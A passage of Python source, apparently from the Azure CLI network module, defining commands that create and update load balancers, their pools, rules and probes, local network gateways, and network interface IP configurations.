DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
sku = 'standard'
tier = 'Global'
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, tier))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, None, None, None, sku, frontend_ip_zone, None, tier)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_cross_region_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, zone=None):
FrontendIPConfiguration, SubResource = cmd.get_models(
'FrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_config = FrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def set_cross_region_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, public_ip_address=None, public_ip_prefix=None):
PublicIPAddress, SubResource = cmd.get_models('PublicIPAddress', 'SubResource')
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return parent
def create_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
(BackendAddressPool,
LoadBalancerBackendAddress,
FrontendIPConfiguration) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'FrontendIPConfiguration')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
# pylint: disable=line-too-long
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=addr['frontend_ip_address'])) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise CLIError('Each backend address must have name and frontend_ip_configuration information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def delete_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name): # pylint: disable=line-too-long
ncf = network_client_factory(cmd.cli_ctx)
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
def add_cross_region_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name, frontend_ip_address):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
# pylint: disable=line-too-long
(LoadBalancerBackendAddress, FrontendIPConfiguration) = cmd.get_models('LoadBalancerBackendAddress', 'FrontendIPConfiguration')
new_address = LoadBalancerBackendAddress(name=address_name,
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=frontend_ip_address) if frontend_ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def create_cross_region_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, i) for i in backend_pools_name]
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_cross_region_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
# To keep compatible when bump version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
# endregion
# pylint: disable=line-too-long
def add_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
address_name, ip_address, vnet=None, subnet=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
if cmd.supported_api_version(min_api='2020-11-01'):
if vnet:
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=_process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name)) if subnet else None,
virtual_network=VirtualNetwork(id=vnet),
ip_address=ip_address if ip_address else None)
elif is_valid_resource_id(subnet):
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=subnet),
ip_address=ip_address if ip_address else None)
else:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet name | subnet id) information.')
else:
new_address = LoadBalancerBackendAddress(name=address_name,
virtual_network=VirtualNetwork(id=vnet) if vnet else None,
ip_address=ip_address if ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
lb_addresses = [addr for addr in address_pool.load_balancer_backend_addresses if addr.name != address_name]
address_pool.load_balancer_backend_addresses = lb_addresses
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.load_balancer_backend_addresses
def create_lb_outbound_rule(cmd, resource_group_name, load_balancer_name, item_name,
backend_address_pool, frontend_ip_configurations, protocol,
outbound_ports=None, enable_tcp_reset=None, idle_timeout=None):
OutboundRule, SubResource = cmd.get_models('OutboundRule', 'SubResource')
client = network_client_factory(cmd.cli_ctx).load_balancers
lb = lb_get(client, resource_group_name, load_balancer_name)
rule = OutboundRule(
protocol=protocol, enable_tcp_reset=enable_tcp_reset, idle_timeout_in_minutes=idle_timeout,
backend_address_pool=SubResource(id=backend_address_pool),
frontend_ip_configurations=[SubResource(id=x) for x in frontend_ip_configurations]
if frontend_ip_configurations else None,
allocated_outbound_ports=outbound_ports, name=item_name)
upsert_to_collection(lb, 'outbound_rules', rule, 'name')
poller = client.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().outbound_rules, item_name)
def set_lb_outbound_rule(instance, cmd, parent, item_name, protocol=None, outbound_ports=None,
idle_timeout=None, frontend_ip_configurations=None, enable_tcp_reset=None,
backend_address_pool=None):
SubResource = cmd.get_models('SubResource')
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('allocated_outbound_ports', outbound_ports)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('backend_address_pool', SubResource(id=backend_address_pool)
if backend_address_pool else None)
c.set_param('frontend_ip_configurations',
[SubResource(id=x) for x in frontend_ip_configurations] if frontend_ip_configurations else None)
return parent
def create_lb_probe(cmd, resource_group_name, load_balancer_name, item_name, protocol, port,
path=None, interval=None, threshold=None):
Probe = cmd.get_models('Probe')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_probe = Probe(
protocol=protocol, port=port, interval_in_seconds=interval, number_of_probes=threshold,
request_path=path, name=item_name)
upsert_to_collection(lb, 'probes', new_probe, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().probes, item_name)
def set_lb_probe(cmd, instance, parent, item_name, protocol=None, port=None,
path=None, interval=None, threshold=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('port', port)
c.set_param('request_path', path)
c.set_param('interval_in_seconds', interval)
c.set_param('number_of_probes', threshold)
return parent
def create_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, disable_outbound_snat=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
# avoid break when backend_address_pool_name is None and backend_pools_name is not None
if not backend_address_pool_name and backend_pools_name:
backend_address_pool_name = backend_pools_name[0]
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset,
disable_outbound_snat=disable_outbound_snat)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, name) for name in backend_pools_name]
# Otherwiase service will response error : (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
new_rule.backend_address_pool = None
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution='default', floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
disable_outbound_snat=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('disable_outbound_snat', disable_outbound_snat)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
# To keep compatible when bump version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
# Otherwiase service will response error : (LoadBalancingRuleBackendAdressPoolAndBackendAddressPoolsCannotBeSetAtTheSameTimeWithDifferentValue) BackendAddressPool and BackendAddressPools[] in LoadBalancingRule rule2 cannot be set at the same time with different value.
instance.backend_address_pool = None
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
def add_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, protocol, identifier, traffic_type, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
tunnel_interface = GatewayLoadBalancerTunnelInterface(port=port, identifier=identifier, protocol=protocol, type=traffic_type)
if not address_pool.tunnel_interfaces:
address_pool.tunnel_interfaces = []
address_pool.tunnel_interfaces.append(tunnel_interface)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def update_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index, protocol=None, identifier=None, traffic_type=None, port=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
raise UnrecognizedArgumentError(f'{index} is out of scope, please input proper index')
item = address_pool.tunnel_interfaces[index]
if protocol:
item.protocol = protocol
if identifier:
item.identifier = identifier
if port:
item.port = port
if traffic_type:
item.type = traffic_type
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, index):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if index >= len(address_pool.tunnel_interfaces):
raise UnrecognizedArgumentError(f'{index} is out of scope, please input proper index')
address_pool.tunnel_interfaces.pop(index)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_tunnel_interface(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.tunnel_interfaces
# endregion
# region LocalGateways
def _validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight):
if any([asn, bgp_peering_address, peer_weight]):
if instance.bgp_settings is not None:
# update existing parameters selectively
if asn is not None:
instance.bgp_settings.asn = asn
if peer_weight is not None:
instance.bgp_settings.peer_weight = peer_weight
if bgp_peering_address is not None:
instance.bgp_settings.bgp_peering_address = bgp_peering_address
elif asn:
BgpSettings = cmd.get_models('BgpSettings')
instance.bgp_settings = BgpSettings(asn, bgp_peering_address, peer_weight)
else:
raise CLIError(
'incorrect usage: --asn ASN [--peer-weight WEIGHT --bgp-peering-address IP]')
def create_local_gateway(cmd, resource_group_name, local_network_gateway_name, gateway_ip_address,
location=None, tags=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, no_wait=False):
AddressSpace, LocalNetworkGateway, BgpSettings = cmd.get_models(
'AddressSpace', 'LocalNetworkGateway', 'BgpSettings')
client = network_client_factory(cmd.cli_ctx).local_network_gateways
local_gateway = LocalNetworkGateway(
local_network_address_space=AddressSpace(address_prefixes=(local_address_prefix or [])),
location=location, tags=tags, gateway_ip_address=gateway_ip_address)
if bgp_peering_address or asn or peer_weight:
local_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, local_network_gateway_name, local_gateway)
def update_local_gateway(cmd, instance, gateway_ip_address=None, local_address_prefix=None, asn=None,
bgp_peering_address=None, peer_weight=None, tags=None):
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
if gateway_ip_address is not None:
instance.gateway_ip_address = gateway_ip_address
if local_address_prefix is not None:
instance.local_network_address_space.address_prefixes = local_address_prefix
if tags is not None:
instance.tags = tags
return instance
# endregion
# region NetworkInterfaces (NIC)
def create_nic(cmd, resource_group_name, network_interface_name, subnet, location=None, tags=None,
internal_dns_name_label=None, dns_servers=None, enable_ip_forwarding=False,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
load_balancer_name=None, network_security_group=None,
private_ip_address=None, private_ip_address_version=None,
public_ip_address=None, virtual_network_name=None, enable_accelerated_networking=None,
application_security_groups=None, no_wait=False,
app_gateway_backend_address_pools=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
(NetworkInterface, NetworkInterfaceDnsSettings, NetworkInterfaceIPConfiguration, NetworkSecurityGroup,
PublicIPAddress, Subnet, SubResource) = cmd.get_models(
'NetworkInterface', 'NetworkInterfaceDnsSettings', 'NetworkInterfaceIPConfiguration',
'NetworkSecurityGroup', 'PublicIPAddress', 'Subnet', 'SubResource')
dns_settings = NetworkInterfaceDnsSettings(internal_dns_name_label=internal_dns_name_label,
dns_servers=dns_servers or [])
nic = NetworkInterface(location=location, tags=tags, enable_ip_forwarding=enable_ip_forwarding,
dns_settings=dns_settings)
if cmd.supported_api_version(min_api='2016-09-01'):
nic.enable_accelerated_networking = enable_accelerated_networking
if network_security_group:
nic.network_security_group = NetworkSecurityGroup(id=network_security_group)
ip_config_args = {
'name': 'ipconfig1',
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic',
'private_ip_address': private_ip_address,
'subnet': Subnet(id=subnet),
'application_gateway_backend_address_pools':
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if app_gateway_backend_address_pools else None
}
if cmd.supported_api_version(min_api='2016-09-01'):
ip_config_args['private_ip_address_version'] = private_ip_address_version
if cmd.supported_api_version(min_api='2017-09-01'):
ip_config_args['application_security_groups'] = application_security_groups
ip_config = NetworkInterfaceIPConfiguration(**ip_config_args)
if public_ip_address:
ip_config.public_ip_address = PublicIPAddress(id=public_ip_address)
nic.ip_configurations = [ip_config]
if edge_zone:
nic.extended_location = _edge_zone_model(cmd, edge_zone)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, network_interface_name, nic)
def update_nic(cmd, instance, network_security_group=None, enable_ip_forwarding=None,
internal_dns_name_label=None, dns_servers=None, enable_accelerated_networking=None):
if enable_ip_forwarding is not None:
instance.enable_ip_forwarding = enable_ip_forwarding
if network_security_group == '':
instance.network_security_group = None
elif network_security_group is not None:
NetworkSecurityGroup = cmd.get_models('NetworkSecurityGroup')
instance.network_security_group = NetworkSecurityGroup(id=network_security_group)
if internal_dns_name_label == '':
instance.dns_settings.internal_dns_name_label = None
elif internal_dns_name_label is not None:
instance.dns_settings.internal_dns_name_label = internal_dns_name_label
if dns_servers == ['']:
instance.dns_settings.dns_servers = None
elif dns_servers:
instance.dns_settings.dns_servers = dns_servers
if enable_accelerated_networking is not None:
instance.enable_accelerated_networking = enable_accelerated_networking
return instance
def create_nic_ip_config(cmd, resource_group_name, network_interface_name, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None,
make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None):
NetworkInterfaceIPConfiguration, PublicIPAddress, Subnet, SubResource = cmd.get_models(
'NetworkInterfaceIPConfiguration', 'PublicIPAddress', 'Subnet', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
nic = ncf.network_interfaces.get(resource_group_name, network_interface_name)
if cmd.supported_api_version(min_api='2016-09-01'):
IPVersion = cmd.get_models('IPVersion')
private_ip_address_version = private_ip_address_version or IPVersion.I_PV4.value
if private_ip_address_version == IPVersion.I_PV4.value and not subnet:
primary_config = next(x for x in nic.ip_configurations if x.primary)
subnet = primary_config.subnet.id
if make_primary:
for config in nic.ip_configurations:
config.primary = False
new_config_args = {
'name': ip_config_name,
'subnet': Subnet(id=subnet) if subnet else None,
'public_ip_address': PublicIPAddress(id=public_ip_address) if public_ip_address else None,
'load_balancer_backend_address_pools': load_balancer_backend_address_pool_ids,
'load_balancer_inbound_nat_rules': load_balancer_inbound_nat_rule_ids,
'private_ip_address': private_ip_address,
'private_ip_allocation_method': 'Static' if private_ip_address else 'Dynamic'
}
if cmd.supported_api_version(min_api='2016-09-01'):
new_config_args['private_ip_address_version'] = private_ip_address_version
new_config_args['primary'] = make_primary
if cmd.supported_api_version(min_api='2017-09-01'):
new_config_args['application_security_groups'] = application_security_groups
if cmd.supported_api_version(min_api='2018-08-01'):
new_config_args['application_gateway_backend_address_pools'] = \
[SubResource(id=x) for x in app_gateway_backend_address_pools] \
if app_gateway_backend_address_pools else None
new_config = NetworkInterfaceIPConfiguration(**new_config_args)
upsert_to_collection(nic, 'ip_configurations', new_config, 'name')
poller = ncf.network_interfaces.begin_create_or_update(
resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def update_nic_ip_config_setter(cmd, resource_group_name, network_interface_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).network_interfaces
return client.begin_create_or_update(resource_group_name, network_interface_name, parameters)
def set_nic_ip_config(cmd, instance, parent, ip_config_name, subnet=None,
virtual_network_name=None, public_ip_address=None, load_balancer_name=None,
load_balancer_backend_address_pool_ids=None,
load_balancer_inbound_nat_rule_ids=None,
private_ip_address=None,
private_ip_address_version=None, make_primary=False,
application_security_groups=None,
app_gateway_backend_address_pools=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if make_primary:
for config in parent.ip_configurations:
config.primary = False
instance.primary = True
if private_ip_address == '':
# switch private IP address allocation to Dynamic if empty string is used
instance.private_ip_address = None
instance.private_ip_allocation_method = 'dynamic'
if cmd.supported_api_version(min_api='2016-09-01'):
instance.private_ip_address_version = 'ipv4'
elif private_ip_address is not None:
# if specific address provided, allocation is static
instance.private_ip_address = private_ip_address
instance.private_ip_allocation_method = 'static'
if private_ip_address_version is not None:
instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if load_balancer_backend_address_pool_ids == '':
instance.load_balancer_backend_address_pools = None
elif load_balancer_backend_address_pool_ids is not None:
instance.load_balancer_backend_address_pools = load_balancer_backend_address_pool_ids
if load_balancer_inbound_nat_rule_ids == '':
instance.load_balancer_inbound_nat_rules = None
elif load_balancer_inbound_nat_rule_ids is not None:
instance.load_balancer_inbound_nat_rules = load_balancer_inbound_nat_rule_ids
if application_security_groups == ['']:
instance.application_security_groups = None
elif application_security_groups:
instance.application_security_groups = application_security_groups
if app_gateway_backend_address_pools == ['']:
instance.application_gateway_backend_address_pools = None
elif app_gateway_backend_address_pools:
instance.application_gateway_backend_address_pools = \
[SubResource(id=x) for x in app_gateway_backend_address_pools]
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _get_nic_ip_config(nic, name):
if nic.ip_configurations:
ip_config = next(
(x for x in nic.ip_configurations if x.name.lower() == name.lower()), None)
else:
ip_config = None
if not ip_config:
raise CLIError('IP configuration {} not found.'.format(name))
return ip_config
def add_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
BackendAddressPool = cmd.get_models('BackendAddressPool')
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
upsert_to_collection(ip_config, 'load_balancer_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
elif application_gateway_name:
upsert_to_collection(ip_config, 'application_gateway_backend_address_pools',
BackendAddressPool(id=backend_address_pool),
'id')
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def remove_nic_ip_config_address_pool(
cmd, resource_group_name, network_interface_name, ip_config_name, backend_address_pool,
load_balancer_name=None, application_gateway_name=None):
client = network_client_factory(cmd.cli_ctx).network_interfaces
nic = client.get(resource_group_name, network_interface_name)
ip_config = _get_nic_ip_config(nic, ip_config_name)
if load_balancer_name:
keep_items = [x for x in ip_config.load_balancer_backend_address_pools or [] if x.id != backend_address_pool]
ip_config.load_balancer_backend_address_pools = keep_items
elif application_gateway_name:
keep_items = [x for x in ip_config.application_gateway_backend_address_pools or [] if
x.id != backend_address_pool]
ip_config.application_gateway_backend_address_pools = keep_items
poller = client.begin_create_or_update(resource_group_name, network_interface_name, nic)
return get_property(poller.result().ip_configurations, ip_config_name)
def add_nic_ip_config_inbound_nat_rule(
